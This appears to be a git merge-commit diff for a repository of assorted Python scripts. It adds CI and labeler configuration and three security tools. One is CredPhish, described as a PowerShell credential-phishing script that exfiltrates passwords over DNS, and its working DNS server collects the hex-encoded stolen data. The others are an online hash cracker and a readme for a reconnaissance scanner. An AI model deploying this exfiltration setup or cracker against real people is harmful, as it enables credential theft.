Merge branch 'master' into rapidScan

Author: avinashkranjan

.github/labeler-config.yml

@@ -0,0 +1,51 @@
+filters:
+  - label: "enhancement"
+    regexs:
+      - /\bfeat\b/
+      - /feature/i
+    events: [pull_request]
+    targets: [title]
+
+  - label: "documentation"
+    regexs:
+      - /\bdocumentation\b/
+      - /docs/i
+    events: [pull_request]
+    targets: [title]
+
+  - label: "bug"
+    regexs:
+      - /bug/i
+    events: [pull_request]
+    targets: [title]
+  - label: "bug"
+    regexs:
+      - /fix/i
+    events: [pull_request]
+    targets: [title]
+
+  - label: "chore"
+    regexs:
+      - /chore/i
+    events: [pull_request]
+    targets: [title]
+
+  - label: "goal: build"
+    regexs:
+      - /build/i
+    events: [pull_request]
+    targets: [title]
+
+  - label: "goal: refactor"
+    regexs:
+      - /\brefactor\b/
+      - /refactor/i
+    events: [pull_request]
+    targets: [title]
+
+  - label: "accessibility"
+    regexs:
+      - /\baccessibility\b/
+      - /accessibility/i
+    events: [pull_request] # default -> [issues, pull_request]
+    targets: [title] # default -> [title, comment]

.github/workflows/add-labels-pr.yml

@@ -0,0 +1,24 @@
+# reference: https://github.com/hoho4190/issue-pr-labeler
+name: PR Labeler
+
+on:
+  pull_request_target:
+    types:
+      - opened
+      - reopened
+
+jobs:
+  main:
+    runs-on: ubuntu-latest
+
+    permissions:
+      contents: read # to read configuration yml file
+      pull-requests: write # to add labels to pull requests
+
+    steps:
+      - name: Run PR Labeler
+        uses: hoho4190/issue-pr-labeler@v1
+        with:
+          token: ${{ secrets.GITHUB_TOKEN }}
+          config-file-name: labeler-config.yml
+        #   disable-bot: true  # this will prevent issues, PRs created by bots

.github/workflows/black.yml

@@ -1,15 +1,30 @@
-name: Linting with black
+name: Linting with Black
 
-on: [push, pull_request]
+on:
+  push:
+    branches:
+      - master  
+  pull_request:  # Trigger on pull requests as well
+    branches:
+      - master
 
 jobs:
-
   black-linting:
-
     runs-on: ubuntu-latest
 
     steps:
+      - name: Checkout Repository
+        uses: actions/checkout@v3
+
+      - name: Set up Python
+        uses: actions/setup-python@v3
+        with:
+          python-version: 3.8  
 
-      - uses: actions/checkout@v3
+      - name: Install Dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip install black
 
-      - uses: psf/black@stable
+      - name: Run Black
+        run: black . --check --diff

CredPhish/Readme.md

@@ -0,0 +1,4 @@
+# CredPhish
+
+CredPhish is a PowerShell script designed to invoke credential prompts and exfiltrate passwords. It relies on CredentialPicker to collect user passwords, Resolve-DnsName for DNS exfiltration, and Windows Defender's ConfigSecurityPolicy.exe to perform arbitrary GET requests.
+

CredPhish/dns_server.py

@@ -0,0 +1,44 @@
+
+from twisted.internet import defer, reactor
+from twisted.names import server, error, client, dns
+
+# listening port
+udp_port = 53
+
+resolv_conf = '/etc/resolv.conf'
+
+exfil_data = []
+
+class DecodeSubdomain:
+    """
+    decode subdomain and update query.name before resolving
+    """
+    def query(self, query, timeout=None):
+        # seperate subdomain from domain and convert to string array
+        query_name = str(query.name).split('.', 1)
+
+        # decode subdomain hex value(s)
+        decoded_hex = bytes.fromhex(query_name[0]).decode('utf-8')
+
+        # append decoded value to array
+        exfil_data.append(decoded_hex)
+
+        # update query.name to exclude subdomain before resolving A record
+        query.name.name = str.encode(query_name[1])
+
+        # print with fancy formatting
+        print('\033[32m{:>6}\033[0m : {}'.format(decoded_hex, '.'.join(query_name)))
+
+        return defer.fail(error.DomainError())
+
+def main():
+    factory = server.DNSServerFactory(
+        clients=[DecodeSubdomain(), client.Resolver(resolv=resolv_conf)]
+    )
+    reactor.listenUDP(udp_port, dns.DNSDatagramProtocol(controller=factory))
+    reactor.run()
+
+    print("\n\n", ''.join(exfil_data))
+
+if __name__ == '__main__':
+    raise SystemExit(main())

Hash Buster/README.md

@@ -0,0 +1,31 @@
+# HASH BUSTER
+
+This Python script is designed for hash cracking, allowing users to crack hashed passwords or strings using various online APIs. The script offers an optimized and extensible approach to hash cracking and includes features such as concurrent processing, caching, and support for multiple hash algorithms.
+
+## Features
+
+- Crack single hashes, hashes from a file, or hashes from files in a directory.
+- Support for common hash algorithms: MD5, SHA-1, SHA-256, SHA-384, SHA-512.
+- Multi-threaded processing for faster cracking.
+- Caching mechanism to store and retrieve previously cracked hashes.
+- Display of progress using a percentage indicator.
+- Placeholder for dictionary-based attacks (disabled by default).
+- Customizable color-coded terminal output.
+
+## Prerequisites
+
+- Python 3.x
+- Required Python libraries: `re`, `os`, `requests`, `argparse`, `concurrent.futures`
+
+## Usage
+
+1. Clone or download this repository to your local machine.
+
+2. Open a terminal and navigate to the directory containing the script.
+
+3. Run the script using the following command-line options:
+
+   - `-s` followed by a single hash to crack that hash.
+   - `-f` followed by a path to a file containing multiple hashes to crack.
+   - `-d` followed by a path to a directory containing files with hashes to crack.
+   - `-t` followed by the desired number of threads (default is 4).

Hash Buster/buster.py

@@ -0,0 +1,163 @@
+#!/usr/bin/env python3
+
+import re
+import os
+import requests
+import argparse
+import concurrent.futures
+from hashlib import algorithms_available
+
+parser = argparse.ArgumentParser()
+parser.add_argument('-s', help='hash', dest='hash')
+parser.add_argument('-f', help='file containing hashes', dest='file')
+parser.add_argument('-d', help='directory containing hashes', dest='dir')
+parser.add_argument('-t', help='number of threads', dest='threads', type=int, default=4)
+parser.add_argument('--wordlist', help='dictionary file for dictionary-based attacks', dest='wordlist')
+args = parser.parse_args()
+
+# Colors and other text formatting codes (you can customize them as you like)
+END = '\033[0m'
+RED = '\033[91m'
+GREEN = '\033[92m'
+WHITE = '\033[97m'
+DGREEN = '\033[32m'
+YELLOW = '\033[93m'
+BACK = '\033[7;91m'
+RUN = '\033[97m[~]\033[0m'
+QUE = '\033[94m[?]\033[0m'
+BAD = '\033[91m[-]\033[0m'
+INFO = '\033[93m[!]\033[0m'
+GOOD = '\033[92m[+]\033[0m'
+
+cwd = os.getcwd()
+directory = args.dir
+file = args.file
+thread_count = args.threads
+
+# Check for valid hashing algorithms available on the system
+valid_algorithms = set(algorithms_available)
+hash_algorithms = ['md5', 'sha1', 'sha256', 'sha384', 'sha512']
+hash_algorithms = [alg for alg in hash_algorithms if alg in valid_algorithms]
+
+# The list of APIs to be used for cracking each hash type (you can add more APIs)
+hash_cracking_apis = {
+    'md5': [
+        'https://hashtoolkit.com/reverse-hash/?hash=',
+        'https://www.nitrxgen.net/md5db/',
+    ],
+    'sha1': [
+        'https://hashtoolkit.com/reverse-sha1-hash/?hash=',
+    ],
+    'sha256': [
+        'https://hashtoolkit.com/reverse-sha256-hash/?hash=',
+    ],
+    'sha384': [
+        'https://hashtoolkit.com/reverse-sha384-hash/?hash=',
+    ],
+    'sha512': [
+        'https://hashtoolkit.com/reverse-sha512-hash/?hash=',
+    ],
+}
+
+# Dictionary to store previously cracked hashes
+hash_cache = {}
+
+# Function to perform hash cracking using online APIs
+def crack_hash_online(hash_value, algorithm):
+    if hash_value in hash_cache:
+        return hash_cache[hash_value]
+    
+    if algorithm not in hash_cracking_apis:
+        return False
+    
+    for api_url in hash_cracking_apis[algorithm]:
+        try:
+            response = requests.get(api_url + hash_value).text
+            if response and 'error' not in response.lower():
+                result = re.findall(r'<em>(.*?)</em>', response)
+                if result:
+                    cracked_hash = result[0]
+                    hash_cache[hash_value] = cracked_hash
+                    return cracked_hash
+        except requests.RequestException:
+            continue
+
+    return False
+
+# Function to perform dictionary-based hash cracking (optional)
+def crack_hash_dictionary(hash_value, algorithm, wordlist):
+    if not wordlist:
+        return False
+
+    # Implement dictionary-based hash cracking here (use the wordlist)
+    # Return the cracked hash if successful, or False if not cracked
+    return False
+
+# Function to crack a single hash
+def crack_single_hash(hash_value):
+    for algorithm in hash_algorithms:
+        if len(hash_value) == len(algorithm) * 4:
+            if algorithm in hash_cracking_apis:
+                result = crack_hash_online(hash_value, algorithm)
+                if result:
+                    return algorithm, result
+
+            # Uncomment the line below to enable dictionary-based cracking (optional)
+            # result = crack_hash_dictionary(hash_value, algorithm, args.wordlist)
+            # if result:
+            #     return algorithm, result
+
+    return None, None
+
+# Function to display progress during hash cracking
+def display_progress(total_hashes, cracked_hashes):
+    progress = cracked_hashes / total_hashes * 100
+    print(f"{INFO} Progress: {cracked_hashes}/{total_hashes} hashes cracked ({progress:.2f}%)", end='\r')
+
+# Main function for hash cracking from file
+def crack_from_file(file_path):
+    with open(file_path, 'r') as f:
+        hashes = re.findall(r'[a-f0-9]{32,}', f.read())
+
+    total_hashes = len(hashes)
+    cracked_hashes = 0
+
+    with concurrent.futures.ThreadPoolExecutor(max_workers=thread_count) as executor:
+        futures = {executor.submit(crack_single_hash, hash_value): hash_value for hash_value in hashes}
+
+        for future in concurrent.futures.as_completed(futures):
+            hash_value = futures[future]
+            algorithm, result = future.result()
+
+            if result:
+                print(f"{hash_value} : {algorithm.upper()} - {result}")
+                cracked_hashes += 1
+                display_progress(total_hashes, cracked_hashes)
+
+    print(f"{INFO} Finished! Cracked {cracked_hashes} out of {total_hashes} hashes.")
+
+# Main function for hash cracking from directory
+def crack_from_directory(directory_path):
+    # Implement searching and cracking hashes from files in the directory
+    # You can use regular expressions or other methods to find hash patterns in files
+    pass
+
+# Main function to crack a single hash
+def crack_single_hash_command(hash_value):
+    algorithm, result = crack_single_hash(hash_value)
+    if result:
+        print(f"{hash_value} : {algorithm.upper()} - {result}")
+    else:
+        print(f"{BAD} Hash was not found in any database.")
+
+# Main program flow
+if __name__ == "__main__":
+    if directory:
+        crack_from_directory(directory)
+    elif file:
+        crack_from_file(file)
+    elif args.hash:
+        crack_single_hash_command(args.hash)
+    else:
+        print(f"{BAD} Please provide either a hash, a file containing hashes, or a directory containing hashes.")
+        parser.print_help()

Hash Buster/requirements.txt

@@ -0,0 +1 @@
+requests>=2.26.0

SCRIPTS.md

@@ -95,4 +95,6 @@
 | 61\.     | Instagram Automation | This python script will automate your instagram account just enter your username and password of your account, then enjoy the program ! | [Take me](./Instagram-Automation)
 | 62\.     | Skype Automation | This python script will automate skype account by taking your username and password of your account, this will automate will your program ! | [Take me](./Skype-Automation)
 | 63\.     | Text Decrypter | This python script will decrypt your encrypted text of different cipher techniques (4 techniques) | [Take me](./textdecrypter)
-| 64\.     | RapidScan | The Multi-Tool Web Vulnerability Scanner | [Take me](./RapidScan)
+| 64\.     | RapidScan | The Multi-Tool Web Vulnerability Scanner | [Take me](./RapidScan)
+| 64\.     | CredPhish | CredPhish is a PowerShell script designed to invoke credential prompts and exfiltrate passwords. | [Take me](./CredPhish)
+| 64\.     | WebStor | This script is designed to perform reconnaissance and vulnerability assessment across websites within an organization's networks | [Take me](./WebStor)

WebStor/Readme.md

@@ -0,0 +1,14 @@
+# Web Reconnaissance and Vulnerability Assessment Script
+
+## Overview
+
+This script is designed to perform reconnaissance and vulnerability assessment across websites within an organization's networks. It aims to identify active websites, gather information about their technologies, and check for known vulnerabilities. This script is intended for educational and responsible use within authorized environments.
+
+## Features
+
+- Network scanning to identify active hosts
+- Web crawling to discover accessible pages
+- Fingerprinting of web technologies (server headers, JavaScript libraries, etc.)
+- Matching identified technologies with vulnerability databases
+
+